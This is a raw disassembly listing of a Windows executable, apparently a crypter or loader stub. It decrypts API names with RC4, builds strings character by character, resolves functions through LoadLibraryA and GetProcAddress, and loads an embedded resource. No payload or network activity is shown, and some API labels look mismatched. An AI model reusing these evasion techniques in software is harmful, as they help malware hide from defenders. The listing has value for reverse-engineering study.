; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403E0C proc near ; CODE XREF: sub_4058BC+1C�p
jmp ds:dword_408174
sub_403E0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403E14 proc near ; CODE XREF: sub_4058BC+31�p
jmp ds:dword_408170
sub_403E14 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403E1C proc near ; CODE XREF: sub_4058BC+39�p
jmp ds:dword_40816C
sub_403E1C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E24 proc near ; CODE XREF: sub_403EFC�p
xchg eax, edx
call sub_402570
retn
sub_403E24 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E2C proc near ; DATA XREF: CODE:00405978�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403E51
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407660
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403E58
loc_403E50: ; CODE XREF: sub_403E2C+2A�j
retn
; ---------------------------------------------------------------------------
loc_403E51: ; DATA XREF: sub_403E2C+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_403E50
; ---------------------------------------------------------------------------
loc_403E58: ; CODE XREF: sub_403E2C:loc_403E50�j
; DATA XREF: sub_403E2C+1F�o
pop ebp
retn
sub_403E2C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E5C proc near ; DATA XREF: CODE:00405974�o
sub ds:dword_407660, 1
retn
sub_403E5C endp
; ---------------------------------------------------------------------------
off_403E64 dd offset dword_403E68 ; DATA XREF: sub_403F04+77�r
; sub_403F04+AF�r ...
dword_403E68 dd 42540A11h, 41657479h, 79617272h, 1, 0 dd 11h
dd offset off_401000
dd 69745504h, 408D6Ch
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403E8C proc near ; CODE XREF: sub_4046BC+30�p
; sub_4046BC+48�p
jmp ds:dword_408180
sub_403E8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E94 proc near ; CODE XREF: sub_403EA4+6�p
; sub_404254+6�p ...
push 0
push 0
call sub_403DE4 ; GetProcAddress
call sub_403DDC ; RtlGetLastWin32Error
retn
sub_403E94 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403EA4 proc near ; CODE XREF: CODE:00405A11�p
; CODE:00405A3D�p
push ebx
push esi
mov ebx, edx
mov esi, eax
call sub_403E94
sub eax, 4Dh
push eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_407664 ; FindResourceA
mov ebx, eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_407668 ; SizeofResource
mov [esi], eax
push ebx
mov eax, ds:dword_407650
push eax
call ds:dword_40766C ; LoadResource
mov ebx, eax
push ebx
call ds:dword_407670 ; SetHandleCount
mov esi, eax
test esi, esi
jz short loc_403EF4
push ebx
call ds:dword_407674 ; FreeResource
loc_403EF4: ; CODE XREF: sub_403EA4+47�j
mov eax, esi
pop esi
pop ebx
retn
sub_403EA4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403EFC proc near ; CODE XREF: sub_403F04+97�p
; sub_403F04+D4�p ...
call sub_403E24
retn
sub_403EFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F04 proc near ; CODE XREF: sub_4046BC+62�p
; sub_4046BC+91�p ...
var_418 = dword ptr -418h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFBE8h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_10], ebx
mov [ebp+var_14], ebx
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_4032E8
mov eax, [ebp+var_8]
call sub_4032E8
xor eax, eax
push ebp
push offset loc_404170
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_8]
call sub_40329C
test eax, eax
jz loc_404142
mov eax, [ebp+var_4]
call sub_40329C
test eax, eax
jz loc_404142
mov eax, [ebp+var_8]
call sub_40329C
cmp eax, 100h
jle short loc_403FA2
push 100h
lea eax, [ebp+var_10]
mov ecx, 1
mov edx, off_403E64
call sub_403930
add esp, 4
lea eax, [ebp+var_8]
call sub_403348
mov edx, eax
mov eax, [ebp+var_10]
mov ecx, 100h
call sub_403EFC
jmp short loc_403FDD
; ---------------------------------------------------------------------------
loc_403FA2: ; CODE XREF: sub_403F04+68�j
mov eax, [ebp+var_8]
call sub_40329C
push eax
lea eax, [ebp+var_10]
mov ecx, 1
mov edx, off_403E64
call sub_403930
add esp, 4
mov eax, [ebp+var_8]
call sub_40329C
push eax
lea eax, [ebp+var_8]
call sub_403348
mov edx, eax
mov eax, [ebp+var_10]
pop ecx
call sub_403EFC
loc_403FDD: ; CODE XREF: sub_403F04+9C�j
xor edi, edi
lea eax, [ebp+var_418]
loc_403FE5: ; CODE XREF: sub_403F04+ED�j
mov [eax], edi
inc edi
add eax, 4
cmp edi, 100h
jnz short loc_403FE5
xor esi, esi
xor edi, edi
lea ebx, [ebp+var_418]
loc_403FFD: ; CODE XREF: sub_403F04+146�j
mov eax, [ebp+var_8]
call sub_40329C
push eax
mov eax, edi
pop edx
mov ecx, edx
cdq
idiv ecx
mov eax, [ebp+var_10]
movzx eax, byte ptr [eax+edx]
add esi, [ebx]
add eax, esi
and eax, 800000FFh
jns short loc_404027
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404027: ; CODE XREF: sub_403F04+11A�j
mov esi, eax
mov al, [ebx]
mov edx, [ebp+esi*4+var_418]
mov [ebx], edx
and eax, 0FFh
mov [ebp+esi*4+var_418], eax
inc edi
add ebx, 4
cmp edi, 100h
jnz short loc_403FFD
xor esi, esi
xor ebx, ebx
mov eax, [ebp+var_4]
call sub_40329C
push eax
lea eax, [ebp+var_14]
mov ecx, 1
mov edx, off_403E64
call sub_403930
add esp, 4
mov eax, [ebp+var_4]
call sub_40329C
push eax
lea eax, [ebp+var_4]
call sub_403348
mov edx, eax
mov eax, [ebp+var_14]
pop ecx
call sub_403EFC
mov eax, [ebp+var_4]
call sub_40329C
dec eax
test eax, eax
jl short loc_404116
inc eax
mov [ebp+var_18], eax
xor edi, edi
loc_40409E: ; CODE XREF: sub_403F04+210�j
inc esi
and esi, 800000FFh
jns short loc_4040AF
dec esi
or esi, 0FFFFFF00h
inc esi
loc_4040AF: ; CODE XREF: sub_403F04+1A1�j
add ebx, [ebp+esi*4+var_418]
and ebx, 800000FFh
jns short loc_4040C6
dec ebx
or ebx, 0FFFFFF00h
inc ebx
loc_4040C6: ; CODE XREF: sub_403F04+1B8�j
mov al, byte ptr [ebp+esi*4+var_418]
mov edx, [ebp+ebx*4+var_418]
mov [ebp+esi*4+var_418], edx
and eax, 0FFh
mov [ebp+ebx*4+var_418], eax
mov eax, [ebp+esi*4+var_418]
add eax, [ebp+ebx*4+var_418]
and eax, 800000FFh
jns short loc_404103
dec eax
or eax, 0FFFFFF00h
inc eax
loc_404103: ; CODE XREF: sub_403F04+1F6�j
mov al, byte ptr [ebp+eax*4+var_418]
mov edx, [ebp+var_14]
xor [edx+edi], al
inc edi
dec [ebp+var_18]
jnz short loc_40409E
loc_404116: ; CODE XREF: sub_403F04+192�j
mov eax, [ebp+var_4]
call sub_40329C
mov edx, eax
mov eax, [ebp+var_C]
call sub_403350
mov eax, [ebp+var_4]
call sub_40329C
push eax
mov eax, [ebp+var_C]
call sub_403348
mov edx, [ebp+var_14]
pop ecx
call sub_403EFC
loc_404142: ; CODE XREF: sub_403F04+45�j
; sub_403F04+55�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404177
loc_40414F: ; CODE XREF: sub_403F04+271�j
lea eax, [ebp+var_14]
mov edx, off_403E64
mov ecx, 2
call sub_403468
lea eax, [ebp+var_8]
mov edx, 2
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_404170: ; DATA XREF: sub_403F04+30�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_40414F
; ---------------------------------------------------------------------------
loc_404177: ; CODE XREF: sub_403F04+26B�j
; DATA XREF: sub_403F04+246�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403F04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404180 proc near ; CODE XREF: CODE:00405A8F�p
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_108], ecx
mov [ebp+var_4], ecx
mov esi, eax
lea edi, [ebp+var_104]
mov ecx, 40h
rep movsd
mov edi, edx
xor eax, eax
push ebp
push offset loc_40420C
push dword ptr fs:[eax]
mov fs:[eax], esp
xor esi, esi
jmp short loc_4041D6
; ---------------------------------------------------------------------------
loc_4041BA: ; CODE XREF: sub_404180+5F�j
lea eax, [ebp+var_108]
mov edx, ebx
call sub_403238
mov edx, [ebp+var_108]
lea eax, [ebp+var_4]
call sub_4032A4
inc esi
loc_4041D6: ; CODE XREF: sub_404180+38�j
mov bl, [ebp+esi+var_104]
test bl, bl
jnz short loc_4041BA
mov eax, edi
mov edx, [ebp+var_4]
call sub_40316C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404213
loc_4041F8: ; CODE XREF: sub_404180+91�j
lea eax, [ebp+var_108]
call sub_403118
lea eax, [ebp+var_4]
call sub_403118
retn
; ---------------------------------------------------------------------------
loc_40420C: ; DATA XREF: sub_404180+2B�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_4041F8
; ---------------------------------------------------------------------------
loc_404213: ; CODE XREF: sub_404180+8B�j
; DATA XREF: sub_404180+73�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_404180 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40421C proc near ; DATA XREF: CODE:00405980�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_404241
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4076A4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404248
loc_404240: ; CODE XREF: sub_40421C+2A�j
retn
; ---------------------------------------------------------------------------
loc_404241: ; DATA XREF: sub_40421C+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404240
; ---------------------------------------------------------------------------
loc_404248: ; CODE XREF: sub_40421C:loc_404240�j
; DATA XREF: sub_40421C+1F�o
pop ebp
retn
sub_40421C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40424C proc near ; DATA XREF: CODE:0040597C�o
sub ds:dword_4076A4, 1
retn
sub_40424C endp
; =============== S U B R O U T I N E =======================================
sub_404254 proc near ; CODE XREF: sub_4046BC+22�p
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_5C = byte ptr -5Ch
var_54 = byte ptr -54h
var_4C = byte ptr -4Ch
var_44 = byte ptr -44h
var_38 = byte ptr -38h
var_2C = byte ptr -2Ch
var_20 = byte ptr -20h
var_14 = byte ptr -14h
push ebx
add esp, 0FFFFFF90h
mov ebx, eax
call sub_403E94
mov edx, eax
add edx, 14h
mov eax, esp
mov [eax+1], dl
mov byte ptr [eax], 1
mov edx, esp
lea eax, [esp+74h+var_70]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0Eh
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_70]
mov cl, 2
call sub_402754
lea edx, [esp+74h+var_70]
lea eax, [esp+74h+var_68]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 1Bh
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_68]
mov cl, 3
call sub_402754
lea edx, [esp+74h+var_68]
lea eax, [esp+74h+var_64]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 17h
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_64]
mov cl, 4
call sub_402754
lea edx, [esp+74h+var_64]
lea eax, [esp+74h+var_5C]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0Eh
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_5C]
mov cl, 5
call sub_402754
lea edx, [esp+74h+var_5C]
lea eax, [esp+74h+var_54]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_54]
mov cl, 6
call sub_402754
lea edx, [esp+74h+var_54]
lea eax, [esp+74h+var_4C]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0FFFFFFDCh
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_4C]
mov cl, 7
call sub_402754
lea edx, [esp+74h+var_4C]
lea eax, [esp+74h+var_44]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0FFFFFFDBh
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_44]
mov cl, 8
call sub_402754
lea edx, [esp+74h+var_44]
lea eax, [esp+74h+var_38]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0FFFFFFD7h
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_38]
mov cl, 9
call sub_402754
lea edx, [esp+74h+var_38]
lea eax, [esp+74h+var_2C]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0Dh
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_2C]
mov cl, 0Ah
call sub_402754
lea edx, [esp+74h+var_2C]
lea eax, [esp+74h+var_20]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_20]
mov cl, 0Bh
call sub_402754
lea edx, [esp+74h+var_20]
lea eax, [esp+74h+var_14]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+74h+var_6C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+74h+var_6C]
lea eax, [esp+74h+var_14]
mov cl, 0Ch
call sub_402754
lea edx, [esp+74h+var_14]
mov eax, ebx
call sub_403278
add esp, 70h
pop ebx
retn
sub_404254 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40448C proc near ; CODE XREF: sub_4046BC+3A�p
var_48 = byte ptr -48h
var_44 = byte ptr -44h
var_40 = byte ptr -40h
var_3C = byte ptr -3Ch
var_34 = byte ptr -34h
var_2C = byte ptr -2Ch
var_24 = byte ptr -24h
var_1C = byte ptr -1Ch
var_10 = byte ptr -10h
push ebx
add esp, 0FFFFFFB8h
mov ebx, eax
call sub_403E94
mov edx, eax
add edx, 17h
mov eax, esp
mov [eax+1], dl
mov byte ptr [eax], 1
mov edx, esp
lea eax, [esp+4Ch+var_48]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 1Dh
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_48]
mov cl, 2
call sub_402754
lea edx, [esp+4Ch+var_48]
lea eax, [esp+4Ch+var_40]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0Dh
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_40]
mov cl, 3
call sub_402754
lea edx, [esp+4Ch+var_40]
lea eax, [esp+4Ch+var_3C]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_3C]
mov cl, 4
call sub_402754
lea edx, [esp+4Ch+var_3C]
lea eax, [esp+4Ch+var_34]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_34]
mov cl, 5
call sub_402754
lea edx, [esp+4Ch+var_34]
lea eax, [esp+4Ch+var_2C]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0FFFFFFD7h
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_2C]
mov cl, 6
call sub_402754
lea edx, [esp+4Ch+var_2C]
lea eax, [esp+4Ch+var_24]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0Dh
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_24]
mov cl, 7
call sub_402754
lea edx, [esp+4Ch+var_24]
lea eax, [esp+4Ch+var_1C]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_1C]
mov cl, 8
call sub_402754
lea edx, [esp+4Ch+var_1C]
lea eax, [esp+4Ch+var_10]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 15h
lea eax, [esp+4Ch+var_44]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+4Ch+var_44]
lea eax, [esp+4Ch+var_10]
mov cl, 9
call sub_402754
lea edx, [esp+4Ch+var_10]
mov eax, ebx
call sub_403278
add esp, 48h
pop ebx
retn
sub_40448C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404634 proc near ; CODE XREF: sub_4046BC+52�p
; sub_4046BC+81�p ...
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
push ebx
add esp, 0FFFFFFF0h
mov ebx, eax
call sub_403E94
mov edx, eax
add edx, 0Eh
mov eax, esp
mov [eax+1], dl
mov byte ptr [eax], 1
mov edx, esp
lea eax, [esp+14h+var_10]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 21h
lea eax, [esp+14h+var_C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+14h+var_C]
lea eax, [esp+14h+var_10]
mov cl, 2
call sub_402754
lea edx, [esp+14h+var_10]
lea eax, [esp+14h+var_8]
call sub_402784
call sub_403E94
mov edx, eax
add edx, 0FFFFFFECh
lea eax, [esp+14h+var_C]
mov [eax+1], dl
mov byte ptr [eax], 1
lea edx, [esp+14h+var_C]
lea eax, [esp+14h+var_8]
mov cl, 3
call sub_402754
lea edx, [esp+14h+var_8]
mov eax, ebx
call sub_403278
add esp, 10h
pop ebx
retn
sub_404634 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: CODE:004059FB�p
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 10h
loc_4046C4: ; CODE XREF: sub_4046BC+D�j
push 0
push 0
dec ecx
jnz short loc_4046C4
push ebx
push esi
xor eax, eax
push ebp
push offset loc_404A0E
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
call sub_404254
mov eax, [ebp+var_4]
call sub_4032F8
push eax
call sub_403E8C ; LoadLibraryA
mov ebx, eax
lea eax, [ebp+var_8]
call sub_40448C
mov eax, [ebp+var_8]
call sub_4032F8
push eax
call sub_403E8C ; LoadLibraryA
mov esi, eax
lea eax, [ebp+var_10]
call sub_404634
mov edx, [ebp+var_10]
lea ecx, [ebp+var_C]
mov eax, offset dword_404A24
call sub_403F04
mov eax, [ebp+var_C]
call sub_4032F8
push eax
push esi
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060D4
mov [edx], eax
lea eax, [ebp+var_18]
call sub_404634
mov edx, [ebp+var_18]
lea ecx, [ebp+var_14]
mov eax, offset dword_404A44
call sub_403F04
mov eax, [ebp+var_14]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_406104
mov [edx], eax
lea eax, [ebp+var_20]
call sub_404634
mov edx, [ebp+var_20]
lea ecx, [ebp+var_1C]
mov eax, offset dword_404A5C
call sub_403F04
mov eax, [ebp+var_1C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060EC
mov [edx], eax
lea eax, [ebp+var_28]
call sub_404634
mov edx, [ebp+var_28]
lea ecx, [ebp+var_24]
mov eax, offset dword_404A74
call sub_403F04
mov eax, [ebp+var_24]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060E4
mov [edx], eax
lea eax, [ebp+var_30]
call sub_404634
mov edx, [ebp+var_30]
lea ecx, [ebp+var_2C]
mov eax, offset dword_404A8C
call sub_403F04
mov eax, [ebp+var_2C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060E8
mov [edx], eax
lea eax, [ebp+var_38]
call sub_404634
mov edx, [ebp+var_38]
lea ecx, [ebp+var_34]
mov eax, offset dword_404AA4
call sub_403F04
mov eax, [ebp+var_34]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060F8
mov [edx], eax
lea eax, [ebp+var_40]
call sub_404634
mov edx, [ebp+var_40]
lea ecx, [ebp+var_3C]
mov eax, offset dword_404ABC
call sub_403F04
mov eax, [ebp+var_3C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060C8
mov [edx], eax
lea eax, [ebp+var_48]
call sub_404634
mov edx, [ebp+var_48]
lea ecx, [ebp+var_44]
mov eax, offset dword_404AD0
call sub_403F04
mov eax, [ebp+var_44]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060E0
mov [edx], eax
lea eax, [ebp+var_50]
call sub_404634
mov edx, [ebp+var_50]
lea ecx, [ebp+var_4C]
mov eax, offset dword_404AE8
call sub_403F04
mov eax, [ebp+var_4C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060F0
mov [edx], eax
lea eax, [ebp+var_58]
call sub_404634
mov edx, [ebp+var_58]
lea ecx, [ebp+var_54]
mov eax, offset dword_404B04
call sub_403F04
mov eax, [ebp+var_54]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060D0
mov [edx], eax
lea eax, [ebp+var_60]
call sub_404634
mov edx, [ebp+var_60]
lea ecx, [ebp+var_5C]
mov eax, offset dword_404B20
call sub_403F04
mov eax, [ebp+var_5C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060F4
mov [edx], eax
lea eax, [ebp+var_68]
call sub_404634
mov edx, [ebp+var_68]
lea ecx, [ebp+var_64]
mov eax, offset dword_404B3C
call sub_403F04
mov eax, [ebp+var_64]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060DC
mov [edx], eax
lea eax, [ebp+var_70]
call sub_404634
mov edx, [ebp+var_70]
lea ecx, [ebp+var_6C]
mov eax, offset dword_404B58
call sub_403F04
mov eax, [ebp+var_6C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_406100
mov [edx], eax
lea eax, [ebp+var_78]
call sub_404634
mov edx, [ebp+var_78]
lea ecx, [ebp+var_74]
mov eax, offset dword_404B74
call sub_403F04
mov eax, [ebp+var_74]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060D8
mov [edx], eax
lea eax, [ebp+var_80]
call sub_404634
mov edx, [ebp+var_80]
lea ecx, [ebp+var_7C]
mov eax, offset dword_404B8C
call sub_403F04
mov eax, [ebp+var_7C]
call sub_4032F8
push eax
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060CC
mov [edx], eax
push offset aTerminateproce ; "TerminateProcess"
push ebx
call sub_403DE4 ; GetProcAddress
mov edx, ds:off_4060FC
mov [edx], eax
push esi
mov eax, ds:off_4060C8
mov eax, [eax]
call eax
push ebx
mov eax, ds:off_4060C8
mov eax, [eax]
call eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404A15
loc_404A00: ; CODE XREF: sub_4046BC+357�j
lea eax, [ebp+var_80]
mov edx, 20h
call sub_40313C
retn
; ---------------------------------------------------------------------------
loc_404A0E: ; DATA XREF: sub_4046BC+14�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_404A00
; ---------------------------------------------------------------------------
loc_404A15: ; CODE XREF: sub_4046BC+351�j
; DATA XREF: sub_4046BC+33F�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4046BC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 14h
dword_404A24 dd 0E5190BA2h, 0CE920FE5h, 7ABF9BF8h, 0DB49B168h, 956EA088h
; DATA XREF: sub_4046BC+5D�o
dd 0
dd 0FFFFFFFFh, 0Dh
dword_404A44 dd 0EF2215BEh, 0F7910BDAh, 50AB8CE4h, 4Fh, 0FFFFFFFFh
; DATA XREF: sub_4046BC+8C�o
dd 0Eh
dword_404A5C dd 0EE3615ABh, 0FDB008E7h, 47BD91E2h, 876Dh, 0FFFFFFFFh
; DATA XREF: sub_4046BC+BB�o
dd 0Ch
dword_404A74 dd 0EF2D13B4h, 0F7910BDAh, 50AB8CE4h, 0 dd 0FFFFFFFFh, 0Ch
dword_404A8C dd 0E02F13B4h, 0F7910BDAh, 50AB8CE4h, 0 dd 0FFFFFFFFh, 0Ch
dword_404AA4 dd 0EE290EBEh, 0F7910BDAh, 50AB8CE4h, 0 dd 0FFFFFFFFh, 0Bh
dword_404ABC dd 0EE290EBEh, 0EA8007C4h, 0B18CF0h, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_4046BC+177�o
dword_404AD0 dd 0FF3E15AEh, 0D98E0FFDh, 56A792FDh, 9A4Bh, 0FFFFFFFFh
; DATA XREF: sub_4046BC+1A6�o
dd 10h
dword_404AE8 dd 0FF3E15AEh, 0C88E0FFDh, 50BC91E3h, 0C069966Dh, 0
; DATA XREF: sub_4046BC+1D5�o
dd 0FFFFFFFFh, 12h
dword_404B04 dd 0FF250EAFh, 0F7903EEDh, 46BB9BF2h, 0D7418743h, 0B08Eh
; DATA XREF: sub_4046BC+204�o
dd 0FFFFFFFFh, 11h
dword_404B20 dd 0EF2D19AAh, 0FB8D1CD8h, 78BB8DF4h, 0CA438F6Bh, 85h
; DATA XREF: sub_4046BC+233�o
dd 0FFFFFFFFh, 10h
dword_404B3C dd 0DF3819BFh, 0F9871CE0h, 5BA7BDF5h, 0CC54877Ah, 0
; DATA XREF: sub_4046BC+262�o
dd 0FFFFFFFFh, 10h
dword_404B58 dd 0DF3819ABh, 0F9871CE0h, 5BA7BDF5h, 0CC54877Ah, 0
; DATA XREF: sub_4046BC+291�o
dd 0FFFFFFFFh, 0Eh
dword_404B74 dd 0EA290EBBh, 0EAB20BFCh, 46AD9DFEh, 0A37Dh, 0FFFFFFFFh
; DATA XREF: sub_4046BC+2C0�o
dd 0Ch
